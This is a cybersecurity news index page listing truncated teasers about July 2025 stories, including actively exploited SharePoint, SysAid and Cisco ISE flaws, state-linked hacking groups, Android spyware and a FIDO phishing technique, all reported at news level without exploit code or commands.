The Hacker News | #1 Trusted Source for Cybersecurity News — Index Page

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), on July 22, 2025, added two Microsoft SharePoint flaws, CVE-2025-49704 and CVE-2025-49706, to its Known Exploited Vulnerabilities ( KEV ) catalog, based on evidence of active exploitation. To that end, Federal Civilian Executive Branch (FCEB) agencies are required to remediate identified vulnerabilities by July 23, 2025. "CISA is aware of active exploitation of a spoofing and RCE vulnerability chain involving CVE-2025-49706 and CVE-2025-49704, enabling unauthorized access to on-premise SharePoint servers," the agency said in an updated advisory. The inclusion of the two shortcomings, a spoofing vulnerability and a remote code execution vulnerability collectively tracked as ToolShell, to the KEV catalog comes after Microsoft revealed that Chinese hacking groups like Linen Typhoon and Violet Typhoon leveraged these flaws to breach on-premises SharePoint servers since July 7, 2025. As of writing, the tech...

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two security flaws impacting SysAid IT support software to its Known Exploited Vulnerabilities ( KEV ) catalog, based on evidence of active exploitation. The vulnerabilities in question are listed below - CVE-2025-2775 (CVSS score: 9.3) - An improper restriction of XML external entity (XXE) reference vulnerability in the Checkin processing functionality, allowing for administrator account takeover and file read primitives CVE-2025-2776 (CVSS score: 9.3) - An improper restriction of XML external entity (XXE) reference vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives Both shortcomings were disclosed by watchTowr Labs researchers Sina Kheirkhah and Jake Knott back in May, alongside CVE-2025-2777 (CVSS score: 9.3), a pre-authenticated XXE within the /lshw endpoint. The three vulnerabilities were addressed by SysAid in the on-pre...

Microsoft has formally tied the exploitation of security flaws in internet-facing SharePoint Server instances to two Chinese hacking groups called Linen Typhoon and Violet Typhoon as early as July 7, 2025 , corroborating earlier reports. The tech giant said it also observed a third China-based threat actor, which it tracks as Storm-2603, weaponizing the flaws as well to obtain initial access to target organizations. "With the rapid adoption of these exploits, Microsoft assesses with high confidence that threat actors will continue to integrate them into their attacks against unpatched on-premises SharePoint systems," the tech giant said in a report published today. A brief description of the threat activity clusters is below - Linen Typhoon (aka APT27 , Bronze Union, Emissary Panda, Iodine, Lucky Mouse, Red Phoenix, and UNC215), which is active since 2012 and has been previously attributed to malware families like SysUpdate, HyperBro, and PlugX Violet Typhoon (aka ...

Cisco on Monday updated its advisory of a set of recently disclosed security flaws in Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC) to acknowledge active exploitation. "In July 2025, the Cisco PSIRT [Product Security Incident Response Team], became aware of attempted exploitation of some of these vulnerabilities in the wild," the company said in an alert. The network equipment vendor did not disclose which vulnerabilities have been weaponized in real-world attacks, the identity of the threat actors exploiting them, or the scale of the activity. Cisco ISE plays a central role in network access control, managing which users and devices are allowed onto corporate networks and under what conditions. A compromise at this layer could give attackers unrestricted access to internal systems, bypassing authentication controls and logging mechanisms—turning a policy engine into an open door. The vulnerabilities outlined in the alert are all critical-ra...

Mexican organizations are still being targeted by threat actors to deliver a modified version of AllaKore RAT and SystemBC as part of a long-running campaign.  The activity has been attributed by Arctic Wolf Labs to a financially motivated hacking group called Greedy Sponge . It's believed to be active since early 2021, indiscriminately targeting a wide range of sectors, such as retail, agriculture, public sector, entertainment, manufacturing, transportation, commercial services, capital goods, and banking. "The AllaKore RAT payload has been heavily modified to enable the threat actors to send select banking credentials and unique authentication information back to their command-and-control (C2) server, for the purpose of conducting financial fraud," the cybersecurity company said in an analysis published last week. Details of the campaign were first documented by the BlackBerry Research and Intelligence Team (which is now part of Arctic Wolf) in January 2024, with ...

Making the move from managing a security operations center (SOC) to being a chief information security officer (CISO) is a significant career leap. Not only do you need a solid foundation of tech knowledge but also leadership skills and business smarts.  This article will guide you through the practical steps and skills you'll need to nab an executive cybersecurity job and make the promotion from SOC manager to CISO a reality. Is the CISO role right for you? It's always a good idea to think about how you could move up and grow in your career. Aspiring to be a CISO can be a great career move.  Additionally, certain operational tasks in cybersecurity, especially in a SOC, are becoming increasingly automated, making it vital to develop strategic and leadership skills to stay ahead. Having ambitious goals helps you, as a SOC analyst or lead, stay relevant and valuable in what is a constantly changing field. However, the role of CISO is significantly different from other rol...

The recently disclosed critical Microsoft SharePoint vulnerability has been under exploitation as early as July 7, 2025, according to findings from Check Point Research. The cybersecurity company said it observed first exploitation attempts targeting an unnamed major Western government, with the activity intensifying on July 18 and 19, spanning government, telecommunications, and software sectors in North America and Western Europe. Check Point also said the exploitation efforts originated from three different IP addresses – 104.238.159[.]149, 107.191.58[.]76, and 96.9.125[.]147 – one of which was previously tied to the weaponization of security flaws in Ivanti Endpoint Manager Mobile (EPMM) appliances ( CVE-2025-4427 and CVE-2025-4428 ). "We're witnessing an urgent and active threat: a critical zero-day in SharePoint on-prem is being exploited in the wild, putting thousands of global organizations at risk," Lotem Finkelstein, Director of Threat Intelligence at Chec...

Cybersecurity researchers have unearthed new Android spyware artifacts that are likely affiliated with the Iranian Ministry of Intelligence and Security (MOIS) and have been distributed to targets by masquerading as VPN apps and Starlink, a satellite internet connection service offered by SpaceX. Mobile security vendor Lookout said it discovered four samples of a surveillanceware tool it tracks as DCHSpy one week after the onset of the Israel-Iran conflict last month. Exactly how many people may have installed these apps is not clear. "DCHSpy collects WhatsApp data, accounts, contacts, SMS, files, location, and call logs, and can record audio and take photos," security researchers Alemdar Islamoglu and Justin Albrecht said . First detected in July 2024, DCHSpy is assessed to be the handiwork of MuddyWater , an Iranian nation-state group tied to MOIS. The hacking crew is also called Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Se...

The China-linked cyber espionage group tracked as APT41 has been attributed to a new campaign targeting government IT services in the African region. "The attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within their malware," Kaspersky researchers Denis Kulik and Daniil Pogorelov said . "One of the C2s [command-and-control servers] was a captive SharePoint server within the victim's infrastructure." APT41 is the moniker assigned to a prolific Chinese nation-state hacking group that's known for targeting organizations spanning multiple sectors, including telecom and energy providers, educational institutions, healthcare organizations and IT energy companies in more than three dozen countries. What makes the campaign noteworthy is its focus on Africa, which, as the Russian cybersecurity vendor noted, "had experienced the least activity" from this specific threat actor. That said, the findings line u...

Even in well-secured environments, attackers are getting in—not with flashy exploits, but by quietly taking advantage of weak settings, outdated encryption, and trusted tools left unprotected. These attacks don't depend on zero-days. They work by staying unnoticed—slipping through the cracks in what we monitor and what we assume is safe. What once looked suspicious now blends in, thanks to modular techniques and automation that copy normal behavior. The real concern? Control isn't just being challenged—it's being quietly taken. This week's updates highlight how default settings, blurred trust boundaries, and exposed infrastructure are turning everyday systems into entry points. ⚡ Threat of the Week Critical SharePoint Zero-Day Actively Exploited (Patch Released Today) — Microsoft has released fixes to address two security flaws in SharePoint Server that have come under active exploitation in the wild to breach dozens of organizations across the world. Details of exploitation emer...

By 2025, Zero Trust has evolved from a conceptual framework into an essential pillar of modern security. No longer merely theoretical, it's now a requirement that organizations must adopt. A robust, defensible architecture built on Zero Trust principles does more than satisfy baseline regulatory mandates. It underpins cyber resilience, secures third-party partnerships, and ensures uninterrupted business operations. In turn, more than 80% of organizations plan to implement Zero Trust strategies by 2026, according to a recent Zscaler report .  In the context of Zero Trust, artificial intelligence (AI) can assist greatly as a tool for implementing automation around adaptive trust and continuous risk evaluation. In a Zero Trust architecture, access decisions must adapt continuously to changing factors such as device posture, user behavior, location, workload sensitivity, and more. This constant evaluation generates massive volumes of data, far beyond what human teams can process alo...

Cybersecurity researchers have disclosed a novel attack technique that allows threat actors to downgrade Fast IDentity Online ( FIDO ) key protections by deceiving users into approving authentication requests from spoofed company login portals. FIDO keys are hardware- or software-based authenticators designed to eliminate phishing by binding logins to specific domains using public-private key cryptography. In this case, attackers exploit a legitimate feature—cross-device sign-in—to trick victims into unknowingly authenticating malicious sessions. The activity, observed by Expel as part of a phishing campaign in the wild, has been attributed to a threat actor named PoisonSeed , which was recently flagged as leveraging compromised credentials associated with customer relationship management (CRM) tools and bulk email providers to send spam messages containing cryptocurrency seed phrases and drain victims' digital wallets. "The attacker does this by taking advantage of cross-d...